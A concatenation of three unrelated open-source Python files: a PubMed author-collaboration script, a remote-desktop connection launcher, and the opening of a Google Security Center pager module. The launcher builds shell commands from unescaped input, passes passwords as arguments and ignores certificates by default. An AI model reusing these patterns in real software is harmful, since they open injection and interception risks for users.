# lat
# V = VOID, i.e., not possible
# X = to do (when all country's data are assembled)
# Also: Run an abstract analysis on each keyword/term; this will standardize the terms
# ------------------------------------------------------------------------- #
# General Tools & Information #
# ------------------------------------------------------------------------- #
MAIN_FOLDER = "/Users/tariq/Google Drive/Programming Projects/ZeitSci/"
# Move to AUX_NCBI_DATA Folder
os.chdir(MAIN_FOLDER + "/Data/NCBI_DATA")
pubmed = pd.io.parsers.read_csv("Pubmed2000_to_2015.csv", nrows=100000, encoding='utf-8')
# Clean..for now
pubmed['title'] = pubmed['title'].str.replace("[", "").str.replace("]", "")
tqdm.pandas(desc="status")
# ------------------------------------------------------------------------- #
# Integrate NCBI Metadata with Journal Ranking Information #
# ------------------------------------------------------------------------- #
os.chdir(MAIN_FOLDER + "/Data/WikiPull")
# Read in Journal Database
journal_db = pd.read_csv("wiki_journal_db.csv")
# Remove '.' from Journal_Abbrev
journal_db['Journal_Abbrev'] = journal_db['Journal_Abbrev'].map(lambda x: x if str(x) == 'nan' else x.replace(".", ""))
# Convert Field to list
journal_db['Field'] = journal_db['Field'].map(lambda x: x if str(x) == 'nan' else strlist_to_list(x))
# Convert Discipline to list.
# the first map converts "['item', 'item']" --> ['item', 'item']
# the second map replaces empty lists with nans
journal_db['Discipline'] = journal_db['Discipline'].map(
lambda x: x if str(x) == 'nan' else strlist_to_list(x)). \
map(lambda x: np.NaN if str(x) == 'nan' or len(x) == 1 and x[0] == '' else x)
# Merge Field and Discipline
field_and_discipline = journal_db.apply(lambda x: [x['Field'], x['Discipline']], axis=1)
# Dict with Journal's Full Name as the key
full_title_dict = dict(zip(journal_db['Title'].str.upper(), field_and_discipline))
# Dict with Journal's Abrev. as the key
abrev_title_dict = dict(zip(journal_db['Journal_Abbrev'].str.upper(), field_and_discipline))
# Remove NaN key
abrev_title_dict = {k: v for k, v in abrev_title_dict.items() if str(k) != 'nan'}
def journal_match(full_name, partial_name):
"""
    Function to match a journal to its field and discipline
using the full_title_dict and abrev_title_dict dictionaries.
:param full_name: the full name of the journal.
:type full_name: str
:param partial_name: the abrev. of the journal.
:type partial_name: str
:return: [FIELD, DISCIPLINE]
:rtype: ``nan`` or ``list``
"""
if partial_name.upper() in abrev_title_dict:
return abrev_title_dict[partial_name.upper()]
elif partial_name.upper() != full_name.upper() and full_name.upper() in full_title_dict:
return full_title_dict[full_name.upper()]
else:
return [np.NaN, np.NaN]
# Attempt to add field and discipline information using a journal's full name or abrev.
mapped_field_discipline = pubmed.progress_apply(lambda x: journal_match(x['journal'], x['journal_iso']), axis=1)
# Add journal field to the pubmed data frame
pubmed['field'] = mapped_field_discipline.progress_map(lambda x: x[0])
# Add journal discipline to the pubmed data frame
pubmed['discipline'] = mapped_field_discipline.progress_map(lambda x: x[1])
def duplicate_remover(input_list):
ordered_set = list()
for element in input_list:
if element not in ordered_set:
ordered_set.append(element)
return ordered_set
def grant_processor(grant):
list_of_grants = [g.split("; ") for g in grant.split(" | ")]
grant_ids = list()
agencies = list()
regions = list()
for g in list_of_grants:
for id in g[0].split(", "):
if id not in grant_ids:
grant_ids.append(id)
if g[1] not in agencies:
agencies.append(g[1])
if g[2] not in regions:
regions.append(g[2])
return grant_ids, agencies, regions
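# Illustrative sketch of the grant string format this parser assumes (the IDs, agency
# and region below are made-up examples): grants are separated by " | ", and each grant
# is "ids; agency; region" with the ids comma-separated.
#
#     grant_processor("R01 HL117626, R01 HL117626-02S1; NHLBI NIH HHS; United States")
#     # -> (['R01 HL117626', 'R01 HL117626-02S1'], ['NHLBI NIH HHS'], ['United States'])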
grants = pubmed['grants'].progress_map(grant_processor, na_action='ignore')
pubmed['grant_ids'] = grants.map(lambda x: x[0], na_action='ignore')
pubmed['grant_funders'] = grants.map(lambda x: x[1], na_action='ignore')
pubmed['grant_region'] = grants.map(lambda x: x[2], na_action='ignore')
del pubmed['grants']
def keywords_mesh_combine(keywords, mesh):
if str(keywords) == 'nan' and str(mesh) != 'nan':
return mesh
elif str(mesh) == 'nan' and str(keywords) != 'nan':
return keywords
elif str(mesh) == 'nan' and str(keywords) == 'nan':
return np.NaN
return "; ".join(set(keywords.split("; ") + mesh.split("; ")))
pubmed['keywords'] = pubmed.progress_apply(lambda x: keywords_mesh_combine(x['keywords'], x['mesh_terms']), axis=1)
del pubmed['mesh_terms']
# ------------------------------------------------------------------------- #
# Add Author+Afiliation #
# ------------------------------------------------------------------------- #
pubmed['author'] = pubmed['author'].str.split("; ")
pubmed['affiliation'] = pubmed['affiliation'].str.split("; ")
authors = pubmed['author'][0]
affiliations = pubmed['affiliation'][0]
# want: department + institution
def subsection_and_uni(affiliation, join_output=True, institution_only=False):
# look into C Benz - Medicine
    # bizarre result from:
# 1. pubmed[pubmed['author'].map(lambda x: 'C Hu' in x if str(x) != 'nan' else False)]['institution'][62284]
# 2. and the Eye and Ear Institute
department = None
institution = None
affiliation_split = affiliation.split(", ")
    if len(affiliation_split) == 1:
return np.NaN
department_terms = ['institute', 'department', 'division', 'dept']
institution_terms = ['institute', 'university', 'centre', 'school', 'center', 'clinic',
                         'hospital', 'national laboratory', 'research laboratory', 'college', 'library']
institution_deference = ['institute']
department_match = [i for i in affiliation_split if any(w in i.lower() for w in department_terms)]
if len(department_match) > 0:
department = department_match[0]
institution_match = [i for i in affiliation_split if any(w in i.lower() for w in institution_terms)]
if len(institution_match) == 1:
institution = institution_match[0]
elif len(institution_match) > 1:
institution = institution_match[-1]
if (department is None and institution is None) or institution is None:
return np.NaN
elif institution_only or \
(institution is not None and department is None) or \
(any(i in department.lower() for i in institution_deference) and institution is not None):
return institution
if join_output:
return ", ".join((department, institution))
else:
return ((department if department != None else np.NaN), (institution if institution != None else np.NaN))
def multi_affiliations(affiliations):
processed_affiliations = (subsection_and_uni(a, institution_only=True) for a in affiliations)
cleaned = [i for i in processed_affiliations if str(i) != 'nan']
if len(cleaned):
return "; ".join(cleaned)
else:
return np.NaN
def author_affil(authors, affiliations):
# Remove emails?
if 'nan' in [str(authors), str(affiliations)] or not len(authors) or not len(affiliations):
return np.NaN
if len(authors) > len(affiliations):
authors = authors[:len(affiliations)]
if len(affiliations) > len(authors):
affiliations = affiliations[:len(authors)]
cleaned_affilations = [a for a in map(subsection_and_uni, affiliations) if str(a) != 'nan']
if len(cleaned_affilations):
authors_afil = list(zip(authors, list(map(lambda a: subsection_and_uni(a), cleaned_affilations))))
return [" | ".join(a) for a in authors_afil]
else:
return np.NaN
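# Illustrative sketch (made-up author/affiliation): each author is paired with the
# "department, institution" string extracted from the matching affiliation, and the
# pair is joined with " | ".
#
#     author_affil(["J Smith"],
#                  ["Department of Physics, University of Toronto, Toronto, ON, Canada"])
#     # -> ['J Smith | Department of Physics, University of Toronto']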
pubmed['institutions'] = pubmed['affiliation'].progress_map(lambda a: multi_affiliations(a), na_action='ignore')
pubmed['author_afil'] = pubmed.progress_apply(lambda x: author_affil(x['author'], x['affiliation']), axis=1)
# pubmed['institutions'][pubmed['institutions'].map(lambda x: ";" in x if str(x) != 'nan' else False)]
# TO DO: replace dept and dept.
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# Export
# pubmed['author_afil'] = pubmed['author_afil'].progress_map(lambda x: "; ".join(x))
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ------------------------------------------------------------------------- #
# Add Keywords #
# ------------------------------------------------------------------------- #
# Faster -- 42588.45 ms on average (N=3)
# title_keywords = pubmed['title'].map(lambda x: common_words(x, n=5, return_rank=False, digit_check=False), na_action='ignore')
# # Slower -- 47377.06 ms on average (N=3)...but easier to monitor.
# title_keywords = [0]*pubmed.shape[0]
# for t in range(len(pubmed['title'])):
# if t % 1000 == 0: print(round(float(t)/len(pubmed['title'])*100, 2), "%")
# title_keywords[t] = common_words(pubmed['title'][t], n=5, return_rank=False, digit_check=True, wrap_nans=False)
#
# # Add Keywords based on the title
# pubmed['keywords'] = title_keywords
# ------------------------------------------------------------------------- #
# Find Collaborations #
# ------------------------------------------------------------------------- #
# Most of the 'solutions' below are really just a series of hacks designed to
# drive down the run time because, frankly, this problem is a geometric nightmare when you have ~12 million rows.
# "...premature optimization is the root of all evil." ~ Donald Knuth
# So, you know, do as I say, not...
# ---------------------------------------------------------------------------------------- #
# Author + Index (to be used to locate field_discipline). This operation is vectorized (minus that map()...).
authors_field_discipline = pubmed['author_afil'] + pd.Series(mapped_field_discipline.index).progress_map(lambda x: [x])
# Try to work out collaborators.
# Thanks to @zvone on stackoverflow.
# see: http://stackoverflow.com/questions/39677070/procedure-to-map-all-relationships-between-elements-in-a-list-of-lists
collaborators_dict = defaultdict(set)
for paper in authors_field_discipline:
if str(paper) != 'nan':
for author in paper:
if str(author) != 'nan':
collaborators_dict[author].update(paper)
for author, collaborators in collaborators_dict.items():
collaborators.remove(author)
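# Toy illustration of the mapping above (made-up authors 'A', 'B', 'C' and paper
# indexes 0, 1): papers [['A', 'B', 0], ['B', 'C', 1]] yield
#   collaborators_dict == {'A': {'B', 0}, 'B': {'A', 0, 'C', 1}, 'C': {'B', 1},
#                          0: {'A', 'B'}, 1: {'B', 'C'}}
# i.e., every author maps to its co-authors plus the pubmed row indexes of the papers
# it appeared on (the int indexes are used below to recover fields/disciplines).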
# from itertools import chain
# a = list(chain.from_iterable(authors_field_discipline.dropna().tolist()))
# ------------------------------------------------------------------------- #
# Find the Fields For Each Author #
# ------------------------------------------------------------------------- #
# dict of fields with keys corresponding to the pubmed df
field_nan_drop = pubmed['field'].dropna().reset_index()
index_field_dict = dict(zip(field_nan_drop['index'], field_nan_drop['field']))
# dict of disciplines with keys corresponding to the pubmed df
discipline_nan_drop = pubmed['discipline'].dropna().reset_index()
discipline_field_dict = dict(zip(discipline_nan_drop['index'], discipline_nan_drop['discipline']))
def collaborators_domain_seperator(single_author):
"""
    Separates a single author's collaborator entries (author strings and pubmed row indexes)
    and summarizes their fields and disciplines into an info dict.
Please see: http://stackoverflow.com/questions/14776980/python-splitting-list-that-contains-strings-and-integers
Notes:
1. necessary to set(collab_domain)? Unclear.
2. add year information?
    :param single_author: author key ('Name | Affiliation') used to look up collaborators_dict.
:return:
:rtype: dict
"""
collab_dict = defaultdict(list)
for i in collaborators_dict[single_author]:
collab_dict[type(i)].append(i)
fields = list()
disciplines = list()
for i in collab_dict[int]:
if i in index_field_dict:
fields += index_field_dict[i]
if i in discipline_field_dict:
disciplines += discipline_field_dict[i]
set_fields = set(fields)
set_disciplines = set(disciplines)
info = {"index_of_papers": collab_dict[int]
, "num_authored": len(collab_dict[int])
, "collaborators": collab_dict[str] if len(collab_dict[str]) else np.NaN
, "num_collaborators": len(collab_dict[str])
, "fields": set_fields if len(set_fields) else np.NaN
, "disciplines": set_disciplines if len(set_disciplines) else np.NaN}
return info
# import cProfile
# cProfile.runctx("for i in range(10000): "
# " collaborators_domain_seperator({'Yum SK', 'Youn YA', 55558, 'Lee IG', 55597, 'Kim JH', 'Moon CJ'})"
# , None, locals())
# def fast_flatten(input_list):
# return list(chain.from_iterable(input_list))
c = 0
author_info = dict()
len_authors = len(pubmed['author_afil'])
for authors in pubmed['author_afil']:
c += 1
if c % 10000 == 0 or c == 1:
print(round(float(c) / len_authors * 100, 2), "%")
if str(authors) != 'nan':
for a in authors:
author_info[a] = collaborators_domain_seperator(a)
author_df = pd.DataFrame(list(author_info.values()))
author_full = [a.split(" | ") for a in list(author_info.keys())]
author_df['authors'] = [a[0] for a in author_full]
author_df['institutions'] = [a[1] for a in author_full]
author_df[(author_df.num_collaborators > 0) & pd.notnull(author_df.fields)]
# NOTE:
# Problem: Authors Sharing Name.
# len(set([i for s in pubmed['author'] for i in s]))
# # !=
# len([i for s in pubmed['author'] for i in s])
| gpl-3.0 | -1,397,716,387,540,309,500 | 34.569196 | 128 | 0.577722 | false |
ekorneechev/Connector | source/ctor.py | 1 | 22467 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import time, properties
from GLOBAL import *
from re import escape
try: import keyring
except Exception as error:
class Keyring:
def set_password(self, *args): pass
def get_password(self, *args): return ""
keyring = Keyring()
properties.log.warning("Python 3: %s. Password storage is not available for FreeRDP." % error)
try: enableLog = properties.loadFromFile('default.conf')['LOG']
except KeyError: enableLog = DEFAULT['LOG']
if enableLog: STD_TO_LOG = ' >> ' + STDLOGFILE + " 2>&1 &"
else: STD_TO_LOG = ' &'
def f_write(f_name, cfg):
"""Создание файла с конфигурацией для remmina"""
f = open(WORKFOLDER+f_name,"w")
f.write("[remmina]\n")
for key in cfg.keys():
print(key,cfg[key], sep='=',file=f)
f.close()
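# For illustration (hypothetical call, not part of the original script):
# f_write('.tmp.remmina', {'server': 'host', 'protocol': 'VNC'}) writes a file in
# WORKFOLDER that looks like:
#   [remmina]
#   server=host
#   protocol=VNC
# i.e. a '[remmina]' header followed by one key=value line per dict entry.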
class Remmina:
"""Класс, обеспечивающий подключение через remmina"""
cfg = {}
f_name = ".tmp.remmina"
def create_cfg_file(self, args):
"""Создание файла конфигурации для соединения"""
protocol = self.cfg['protocol']
server, login = properties.searchSshUser(args[0])
self.cfg['server'] = server
self.cfg['name'] = args.pop()
if protocol == 'RDP':
#[user, domain, color, quality, resolution, viewmode, folder, printer, clipboard, sound]
self.cfg['username'] = args[1]
self.cfg['domain'] = args[2]
self.cfg['colordepth'] = args[3]
self.cfg['quality'] = args[4]
self.cfg['resolution'] = args[5]
self.cfg['viewmode'] = args[6]
self.cfg['sharefolder'] = args[7]
self.cfg['shareprinter'] = args[8]
self.cfg['disableclipboard'] = args[9]
self.cfg['sound'] = args[10]
self.cfg['sharesmartcard'] = args[11]
if protocol == 'NX':
#[user, quality, resolution, viewmode, keyfile, crypt, clipboard, _exec]
self.cfg['username'] = args[1]
self.cfg['quality'] = args[2]
self.cfg['resolution'] = args[3]
self.cfg['viewmode'] = args[4]
self.cfg['nx_privatekey'] = args[5]
self.cfg['disableencryption'] = args[6]
self.cfg['disableclipboard'] = args[7]
self.cfg['exec'] = args[8]
if protocol == 'VNC':
#[user, quality, color, viewmode, viewonly, crypt, clipboard, showcursor]
self.cfg['username'] = args[1]
self.cfg['quality'] = args[2]
self.cfg['colordepth'] = args[3]
self.cfg['viewmode'] = args[4]
self.cfg['viewonly'] = args[5]
self.cfg['disableencryption'] = args[6]
self.cfg['disableclipboard'] = args[7]
self.cfg['showcursor'] = args[8]
if protocol == 'XDMCP':
#[color, viewmode, resolution, once, showcursor, _exec]
self.cfg['colordepth'] = args[1]
self.cfg['viewmode'] = args[2]
self.cfg['resolution'] = args[3]
self.cfg['once'] = args[4]
self.cfg['showcursor'] = args[5]
self.cfg['exec'] = args[6]
if protocol == 'SSH':
#[user, SSH_auth, keyfile, charset, _exec]
if login: self.cfg['ssh_username'] = login
else: self.cfg['ssh_username'] = args[1]
self.cfg['ssh_auth'] = args[2]
self.cfg['ssh_privatekey'] = args[3]
self.cfg['ssh_charset'] = args[4]
self.cfg['exec'] = args[5]
if protocol == 'SFTP':
#[user, SSH_auth, keyfile, charset, execpath]
if login: self.cfg['ssh_username'] = login
else: self.cfg['ssh_username'] = args[1]
self.cfg['ssh_auth'] = args[2]
self.cfg['ssh_privatekey'] = args[3]
self.cfg['ssh_charset'] = args[4]
self.cfg['execpath'] = args[5]
if protocol == 'SPICE':
#[tls, viewonly, resize, clipboard, cards, sound, cacert]
self.cfg['usetls'] = args[1]
self.cfg['viewonly'] = args[2]
self.cfg['resizeguest'] = args[3]
self.cfg['disableclipboard'] = args[4]
self.cfg['sharesmartcard'] = args[5]
self.cfg['enableaudio'] = args[6]
self.cfg['cacert'] = args[7]
f_write(self.f_name, self.cfg)
def start(self, parameters):
"""Запуск remmina с необходимыми параметрами"""
self.create_cfg_file(parameters)
properties.log.info ("Remmina: подключение по протоколу %s к серверу: %s", self.cfg['protocol'], self.cfg['server'])
command = 'remmina -c "' + WORKFOLDER + self.f_name + '"'
properties.log.info (command)
os.system('cd $HOME && ' + command + STD_TO_LOG)
class VncRemmina(Remmina):
"""Класс для настройки VNC-соединения через Remmina"""
def __init__(self):
self.cfg = dict(keymap='', quality=9, disableencryption=0, colordepth=24,
hscale=0, group='', password='', name='VNC-connection: ', viewonly=0,
disableclipboard=0, protocol='VNC', vscale=0, username='', disablepasswordstoring=1,
showcursor=0, disableserverinput=0, server='',aspectscale=0,
window_maximize=1, window_width=800, window_height=600, viewmode=1)
self.f_name = '.tmp_VNC.remmina'
class VncViewer:
"""Класс для настройки VNC-соединения через VncViewer"""
def start(self, args):
if type(args) == str:
properties.log.info ("VNC: подключение к серверу %s", args)
command = 'vncviewer ' + args
server = args
else:
command = 'vncviewer ' + args[0] + ' '
if args[1]: command += args[1]
if args[2]: command += args[2]
server = args[0]
properties.log.info ("VNC: подключение к серверу %s. Команда запуска:", server)
properties.log.info (command)
os.system(command + STD_TO_LOG)
class RdpRemmina(Remmina):
"""Класс для настройки RDP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(disableclipboard=0, clientname='', quality=0, console=0, sharesmartcard=0,
resolution='', group='', password='', name='RDP-connection: ',
shareprinter=0, security='', protocol='RDP', execpath='', disablepasswordstoring=1,
sound='off', username='', sharefolder='', domain='', viewmode=3,
server='', colordepth=32, window_maximize=1, window_width=800, window_height=600)
self.cfg['exec'] = ''
self.f_name = '.tmp_RDP.remmina'
class XFreeRdp:
"""Класс для настройки RDP-соединения через xfreerdp"""
def start(self, args):
_link = "http://wiki.myconnector.ru/install#freerdp"
if freerdpCheck():
freerdpVersion = freerdpCheckVersion()
if freerdpVersion > "1.2":
nameConnect = args[len(args)-1]
command = 'xfreerdp /v:' + args[0] + " /t:'" + nameConnect + "'"
if args[1]: command += ' /u:' + args[1]
if args[2]: command += ' /d:' + args[2]
if args[3]: command += ' /f'
if args[4]: command += ' +clipboard'
if args[5]: command += ' /size:' + args[5]
if args[6]: command += ' /bpp:' + args[6]
if args[7]: command += ' /drive:LocalFolder,"' + args[7] + '"'
if args[8]: command += ' /g:' + args[8]
if args[9]: command += ' /gu:' + args[9]
if args[10]: command += ' /gd:' + args[10]
if args[11]:
command = "GATEPWD='" + args[11] + "' && " + command
command += ' /gp:$GATEPWD'
if args[12]: command += ' /admin'
if args[13]: command += SCARD
if args[14]: command += ' /printer'
if args[15]: command += ' /sound:sys:alsa'
if args[16]: command += ' /microphone:sys:alsa'
if args[17]: command += ' /multimon'
if args[18]: command += ' +compression'
if args[19]: command += ' /compression-level:' + args[19]
if args[20]: command += ' +fonts'
if args[21]: command += ' +aero'
if args[22]: command += ' +window-drag'
if args[23]: command += ' +menu-anims'
if args[24]: command += ' -themes'
if args[25]: command += ' -wallpaper'
if args[26]: command += ' /nsc'
if args[27]: command += ' /jpeg'
if args[28]: command += ' /jpeg-quality:' + str(args[28])
if args[29] and properties.checkPath(USBPATH): command += ' /drive:MEDIA,' + USBPATH
if args[31]: command += ' /workarea'
                try: #Compatibility with a previous version; < 1.4.0
if args[32]: command += ' /span'
except IndexError: pass
try: #< 1.4.1
if args[33]: command += ' /drive:Desktop,' + DESKFOLDER
if args[34]: command += ' /drive:Downloads,' + DOWNFOLDER
if args[35]: command += ' /drive:Documents,' + DOCSFOLDER
except IndexError: pass
try: #< 1.8.0
if args[36]: command += ' /gdi:hw'
else: command += ' /gdi:sw'
except IndexError: command += ' /gdi:sw'
try: #< 1.8.2
if args[38]: command += ' /cert-ignore'
if args[37]: command += ' +auto-reconnect'
except IndexError: command += ' +auto-reconnect /cert-ignore'
try:
if args[40] and len(args) >= 42: command += ' /p:' + escape(args[40])
elif args[30]: command += ' /p:' + escape(passwd(args[0], args[1]))
else: command += ' -sec-nla'
except: command += ' -sec-nla'
try:
if args[41] and len(args) >= 43: command += ' +glyph-cache'
except IndexError: pass
try:
                    # for compatibility we also need to check the length of 'args'
                    # length = 'last index' + 1 + 'title of the connection' (since version 1.5.6...)
if args[42] and len(args) >= 44: command += ' ' + args[42]
except IndexError: pass
server = args[0]
properties.log.info ("FreeRDP: подключение к серверу %s. Команда запуска:", server)
try: cmd2log = command.replace("/p:" + command.split("/p:")[1].split(' ')[0],"/p:<hidden>")
except: cmd2log = command
properties.log.info (cmd2log)
os.system(command + STD_TO_LOG)
if enableLog:
signal.signal(signal.SIGCHLD,signal.SIG_IGN)
subprocess.Popen([MAINFOLDER + "/connector-check-xfreerdp-errors"])
else:
properties.log.warning ("FreeRDP version below 1.2!")
os.system("zenity --error --text='\nУстановленная версия FreeRDP (%s) не соответствует минимальным требованиям,"
" подробности <a href=\"%s\">здесь</a>!' --no-wrap --icon-name=connector" % (freerdpVersion, _link))
else:
properties.log.warning ("FreeRDP is not installed!")
os.system("zenity --error --text='\nFreeRDP не установлен, подробности <a href=\"%s\">здесь</a>!' --no-wrap --icon-name=connector" % _link)
class NxRemmina(Remmina):
"""Класс для настройки NX-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='NX-connection: ', protocol='NX', quality=0, disableencryption=0,
resolution='',group='',password='',username='',NX_privatekey='',
showcursor=0, server='', disableclipboard=0, window_maximize=1,
window_width=800, window_height=600, viewmode=4, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_NX.remmina'
class XdmcpRemmina(Remmina):
"""Класс для настройки XDMCP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(resolution='', group='', password='', name='XDMCP-connection: ',
protocol='XDMCP', once=0, showcursor=0, server='',colordepth=0,
window_maximize=1, viewmode=1, window_width=800, window_height=600, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_XDMCP.remmina'
class SftpRemmina(Remmina):
"""Класс для настройки SFTP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SFTP-connection: ', protocol='SFTP', ssh_enabled=0, ssh_auth=0,
ssh_charset='UTF-8', ssh_privatekey='', username='', ssh_username='',
group='', password='', execpath='/', server='', window_maximize=0,
window_height=600, window_width=800, ftp_vpanedpos=360, viewmode=0, disablepasswordstoring=1)
self.f_name = '.tmp_SFTP.remmina'
class SshRemmina(Remmina):
"""Класс для настройки SSH-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SSH-connection: ', protocol='SSH', ssh_auth=0, ssh_charset='UTF-8',
ssh_privatekey='', group='', password='', username='', ssh_username='', ssh_enabled=0,
server='', window_maximize=0, window_width=500, window_height=500, viewmode=0, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_SSH.remmina'
class SpiceRemmina(Remmina):
"""Класс для настройки SPICE-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SPICE-connection: ', protocol='SPICE', ssh_enabled=0, ssh_auth=0,
disableclipboard=0, ssh_privatekey='', usertls=0, ssh_username='',
enableaudio=0, password='', cacert='', server='', ssh_loopback=0,
resizeguest=0, sharesmartcard=0, ssh_server='', viewonly=0, disablepasswordstoring=1)
self.f_name = '.tmp_SPICE.remmina'
class Vmware:
"""Класс для настройки соединения к VMWare серверу"""
def start(self, args):
if vmwareCheck():
if type(args) == str:
command = 'vmware-view -q -s ' + args
properties.log.info ("VMware: подключение к серверу %s", args)
properties.log.info (command)
else:
command = 'vmware-view -q -s ' + args[0]
if args[1]: command += ' -u ' + args[1]
if args[2]: command += ' -d ' + args[2]
if args[4]: command += ' --fullscreen'
properties.log.info ("VMware: подключение к серверу %s", args[0])
properties.log.info (command)
if args[3]: command += ' -p ' + args[3]
os.system(command + STD_TO_LOG)
else:
properties.log.warning ("VMware Horizon Client is not installed!")
os.system("zenity --error --text='\nVMware Horizon Client не установлен!' --no-wrap --icon-name=connector")
def _missCitrix():
"""Message for user, if Citrix Receiver not installed"""
properties.log.warning ("Citrix Receiver is not installed!")
os.system("zenity --error --text='\nCitrix Receiver не установлен!' --no-wrap --icon-name=connector")
class Citrix:
"""Класс для настройки ICA-соединения к Citrix-серверу"""
def start(self, args):
if type(args) == list:
addr = args[0]
else: addr = args
if citrixCheck():
properties.log.info ("Citrix: подключение к серверу %s", addr)
os.system('/opt/Citrix/ICAClient/util/storebrowse --addstore ' + addr)
os.system('/opt/Citrix/ICAClient/selfservice --icaroot /opt/Citrix/ICAClient' + STD_TO_LOG)
else: _missCitrix()
def preferences():
if citrixCheck():
properties.log.info ("Citrix: открытие настроек программы")
os.system('/opt/Citrix/ICAClient/util/configmgr --icaroot /opt/Citrix/ICAClient' + STD_TO_LOG)
else: _missCitrix()
class Web:
"""Класс для настройки подключения к WEB-ресурсу"""
def start(self, args):
if type(args) == list:
addr = args[0]
else: addr = args
        if addr.find("://") == -1:
addr = "http://" + addr
command = 'xdg-open "' + addr + '"'
properties.log.info ("WWW: открытие web-ресурса %s", addr)
properties.log.info (command)
os.system ( command + STD_TO_LOG)
class FileServer:
"""Класс для настройки подключения к файловому серверу"""
def start(self, args):
_exec = properties.loadFromFile('default.conf')['FS'] + ' "'
if type(args) == str:
            if args.find("://") == -1:
os.system("zenity --warning --text='Введите протокол подключения!\n"
"Или выберите из списка в дополнительных параметрах.' --no-wrap --icon-name=connector")
return 1
else:
command = _exec + args + '"'
server = args
else:
try: protocol, server = args[0].split("://")
except: server = args[0]; protocol = args[4]
command = _exec + protocol + "://"
if args[2]: command += args[2] + ";"
if args[1]: command += args[1] + "@"
command += server
if args[3]: command += '/' + args[3]
command += '"'
properties.log.info ("Открытие файлового сервера %s. Команда запуска:", server)
properties.log.info (command)
os.system (command + STD_TO_LOG)
def definition(protocol):
"""Функция определения протокола"""
    whatProgram = properties.loadFromFile('default.conf')  # load settings that choose which program handles each protocol
if protocol == 'VNC':
if whatProgram['VNC'] == 0:
connect = VncRemmina()
else: connect = VncViewer()
elif protocol == 'RDP':
if whatProgram['RDP'] == 0:
connect = RdpRemmina()
else: connect = XFreeRdp()
elif protocol == 'NX':
connect = NxRemmina()
elif protocol == 'XDMCP':
connect = XdmcpRemmina()
elif protocol == 'SSH':
connect = SshRemmina()
elif protocol == 'SFTP':
connect = SftpRemmina()
elif protocol == 'VMWARE':
connect = Vmware()
elif protocol == 'CITRIX':
connect = Citrix()
elif protocol == 'WEB':
connect = Web()
elif protocol == 'SPICE':
connect = SpiceRemmina()
elif protocol == 'FS':
connect = FileServer()
return connect
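# Minimal usage sketch (hypothetical arguments; the GUI normally assembles them per
# protocol, and the last list item is the connection title):
#   connect = definition('RDP')   # RdpRemmina() or XFreeRdp(), depending on default.conf
#   connect.start(['host.example.org', 'user', 'domain', ..., 'My RDP session'])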
def citrixCheck():
"""Фунцкия проверки наличия в системе Citrix Receiver"""
check = int(subprocess.check_output(CITRIX_CHECK + "/dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def vmwareCheck():
"""Фунцкия проверки наличия в системе VMware Horizon Client"""
check = int(subprocess.check_output("which vmware-view > /dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def freerdpCheck():
"""Фунцкия проверки наличия в системе FreeRDP"""
check = int(subprocess.check_output("which xfreerdp > /dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def freerdpCheckVersion():
"""Фунцкия определения версии FreeRDP"""
version = subprocess.check_output("xfreerdp /version; exit 0",shell=True, universal_newlines=True).strip().split('\t')
version = version[0].split(" "); version = version[4].split("-")[0];
return version
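# Illustrative parse (assumed banner; the exact "xfreerdp /version" output varies by build):
#   "This is FreeRDP version 2.0.0-dev (git n/a)"
#   -> version[0].split(" ")[4] == "2.0.0-dev" -> .split("-")[0] == "2.0.0"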
def passwd(server, username):
"""Ввод пароля и запрос о его сохранении в связке ключей"""
password = keyring.get_password(str(server),str(username))
if password: return password
separator = "|CoNnEcToR|"
try:
password, save = subprocess.check_output("zenity --forms --title=\"Аутентификация (with NLA)\" --text=\"Имя пользователя: %s\""
" --add-password=\"Пароль:\" --add-combo=\"Хранить пароль в связке ключей:\" --combo-values=\"Да|Нет\""
" --separator=\"%s\" 2>/dev/null" % (username, separator),shell=True, universal_newlines=True).strip().split(separator)
if save == "Да" and password: keyring.set_password(str(server),str(username),str(password))
    #if the zenity window was closed or the Cancel button pressed, raise the FreeRDP error
except ValueError:
password = " /CANCELED"
properties.log.warning ("FreeRDP: подключение отменено пользователем (окно zenity закрыто или нажата кнопка Отмена):")
return password
if __name__ == "__main__":
pass
| gpl-2.0 | -4,469,510,885,947,356,700 | 46.831435 | 151 | 0.551243 | false |
googleapis/googleapis-gen | google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/pagers.py | 1 | 32661 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
class GroupAssetsPager:
"""A pager for iterating through ``group_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``GroupAssets`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse`
